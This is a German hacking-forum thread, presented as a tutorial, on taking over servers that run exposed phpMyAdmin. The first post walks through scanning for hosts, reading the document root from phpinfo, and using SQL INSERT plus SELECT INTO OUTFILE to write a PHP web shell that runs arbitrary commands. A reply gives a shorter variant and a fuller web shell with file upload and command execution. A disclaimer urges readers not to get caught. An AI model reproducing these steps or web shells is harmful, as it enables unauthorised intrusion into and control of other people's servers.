Thema: (FTP) Richtig Scannen und Cracken - Str0s TuT

Hi Knus !

Erst einmal, scanne über´n str0

ach und shiva kann man nicht ernst nehmen ,weist ja wie er ist.

Also ich hab vor ein paar Wochen von Monk ein PMA - scann Paket bekommen,das ist bis jetzt das beste

als alles andere vorher was ich gefunden habe.Komme damit auch klar nur hab leider noch nix gefunden...

Tool,die ihr braucht
Browser
Shell
Scannz

Also, zuerst scannt ihr.Tut gepostet
Die Results sehen dann z.B. so aus:

129.120.43.132 HTTP Request FOUND (200 OK)

Wenn ihr einen solchen scan habt geht ihr auf:

http:\\129.120.43.132\phpmyadmin\phpinfo.php

Dort guckt ihr erstmal ob das System Windows NT hat.
Danach guckt ihr unter _SERVER["DOCUMENT_ROOT"] und
Kopiert dort den Pfad der dort steht.

Das Document_Root tragt ihr dann in die Shell hier ein:


code:

INSERT INTO shell (text) values ('<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>SH3LL</title></head><body bgcolor=#000000 text=#FFFFFF"
onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST> <input type=TEXT
name="-cmd" size=64 value="<?$cmd?>" tyle="background:#000000;color:#FFFFFF;"><pre><?
if ($cmd != ""; ) print Shell_Exec($cmd); ?></pre></form></body></html>'); SELECT * INTO OUTFILE 'HIERDASDOCUMENTROOT\shell.php' from shell;
FLUSH LOGS


Dann geht ihr auf:
http:\\129.120.43.132\phpmyadmin\index.php

Ihr klickt dann auf Datenbanken (Befindet sich links bei der Index.php)
Ihr wechselt dann auf die Datenbank Mysql und tragt da folgenden Sql befehl ein:

CREATE TABLE shell (text text);

Ihr habt dann eine Table erstellt die shell heißt.
Dann wechselt ihr in die Table und fügt dann als Sql befehl die oben geschriebene
Shell ein.

Wenn der Befehl erfolgreich war geht auf:

http:\\129.120.43.132\shell.php

Dort befindet sich eine cmd zeile.
Dann könnt ihr den Server ganz normal hacken wie bei MSSQL





+++++++++++++++++++++++++++++++++++++++++++



Hacken ist gefährlich und man sollte es nur mit bedacht tun !
Hacken ist strafbar und man sollte sich nicht erwischen lassen !
Hacken ist nichts für kleine Script-Kiddies die keinen Plan haben !

++++++++++++++++++++++++++++++++++++++++++++++++

wozu die datenbank, buster?
es gibt doch auch server da hat man kein recht, eine db anzulegen - brauchst du ja auch nicht.

es reicht, wenn du dir bei /pma/sql.php über select @@datadir oder select @@basedir das docroot anzeigen lässt und dann
SELECT SHELLCODE INTO OUTFILE '/var/www/shell.php' ; --
eingibst. bzw dann das docroot aus dem entsprechenden fall. das anlegen einer datenbank ist in keinem fall notwendig und wenn, kann man dies auch in einem schritt machen:

Code:

CREATE DATABASE ficker;
use ficker;
CREATE TABLE shell (codetab text);

INSERT INTO shell(codetab) VALUES ('Upload your file:<form enctype="multipart/form-data" action="<?php print $_SERVER["PHP_SELF"];?>" method="post"><input type = "hidden" name = "MAX_FILE_FILE" value = "3096000" /><input type = "file" name = "fileupload"><input type = "submit" value = "Upload!"></form><?php $uploaddir = getcwd() ."\\\\\\\\"; $uploadfile = $uploaddir.basename($_FILES["fileupload"]["name"]); print "<pre>"; if (move_uploaded_file($_FILES["fileupload"]["tmp_name"],$uploadfile)){print " File stored ok...";} print "</pre>"; ?><hr>CMD: <? $cmd = $_REQUEST["-cmd"]; ?> <html><head><title>Got Shell?</title><style type="text/css"><!-- body {color: #CC0000;background-color:#000000;} --></style></head><body> <onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"> <input type = "submit" value ="Exec"><hr> <pre> <? if($cmd != "") print Shell_Exec($cmd); ?> </pre></form></body></html>
');
SELECT * INTO OUTFILE '/var/www/shell.php'FROM shell;
FLUSH LOGS ;
DROP DATABASE `ficker`

bin eher so das bequeme scriptkiddie